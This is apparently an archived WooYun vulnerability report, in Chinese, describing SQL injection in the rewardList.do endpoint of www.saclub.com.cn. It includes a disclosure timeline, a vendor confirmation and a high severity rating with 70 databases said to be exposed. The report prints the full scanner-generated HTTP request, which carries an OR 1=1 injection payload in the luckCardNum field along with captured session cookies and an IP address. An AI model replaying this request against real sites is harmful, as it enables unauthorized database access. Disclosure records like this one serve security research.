乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2016-04-08: 细节已通知厂商并且等待厂商处理中 2016-04-11: 厂商已经确认,细节仅向厂商公开 2016-04-21: 细节向核心白帽子及相关领域专家公开 2016-05-01: 细节向普通白帽子公开 2016-05-11: 细节向实习白帽子公开 2016-05-26: 细节向公众公开
POST /rewardList.do HTTP/1.1Content-Length: 717Content-Type: multipart/form-data; boundary=-----AcunetixBoundary_NDMOGETRGTX-Requested-With: XMLHttpRequestReferer: http://www.saclub.com.cn/Cookie: JSESSIONID=nZV3XDkVxsWmrP2QC04Jp1rdTQjYy7Lyp9DsQ8ltjnKqb5G19tJj!15768151; Hm_lvt_6df6f9d56598e7f5e729beb6c4558e60=1459823896,1459823943,1459824204,1459824219; Hm_lpvt_6df6f9d56598e7f5e729beb6c4558e60=1459824219; LiveWSLHG31671888=6359544928882309449790; LiveWSLHG31671888sessionid=6359544928882309449790; fistvisitetime=1459823714543; lastvisitetime=1459824219215; visitecounts=1; visitepages=17; ip=124.114.79.35; ip1=%25u9655%25u897f%25u7701%25u897f%25u5b89%25u5e02; ip2=%25u7535%25u4fe1; BAIDUID=6CC5549320E8DDCEC3A571F32E99F4CB:FG=1; HMACCOUNT=F9BA16831E4645B0; ipfrom=%e9%99%95%e8%a5%bf%e7%9c%81%e8%a5%bf%e5%ae%89%e5%b8%82|%e7%94%b5%e4%bf%a1Host: www.saclub.com.cnConnection: Keep-aliveAccept-Encoding: gzip,deflateUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21Accept: */*Content-Type: multipart/form-data; boundary=-----AcunetixBoundary_LCPDVIKIHE-------AcunetixBoundary_LCPDVIKIHEContent-Disposition: form-data; name="act"-------AcunetixBoundary_LCPDVIKIHEContent-Disposition: form-data; name="currentPage"1-------AcunetixBoundary_LCPDVIKIHEContent-Disposition: form-data; name="luckCardNum"-1' OR 1=1* AND 00062=00062 or '6sY5Lc6x'='-------AcunetixBoundary_LCPDVIKIHEContent-Disposition: form-data; name="luckName"cmkssgdt-------AcunetixBoundary_LCPDVIKIHEContent-Disposition: form-data; name="month"-------AcunetixBoundary_LCPDVIKIHEContent-Disposition: form-data; name="monthId"-------AcunetixBoundary_LCPDVIKIHEContent-Disposition: form-data; name="totalPage"1-------AcunetixBoundary_LCPDVIKIHE--
涉及70个数据库:
危害等级:高
漏洞Rank:10
确认时间:2016-04-11 16:47
谢谢!我们会尽快修复!
暂无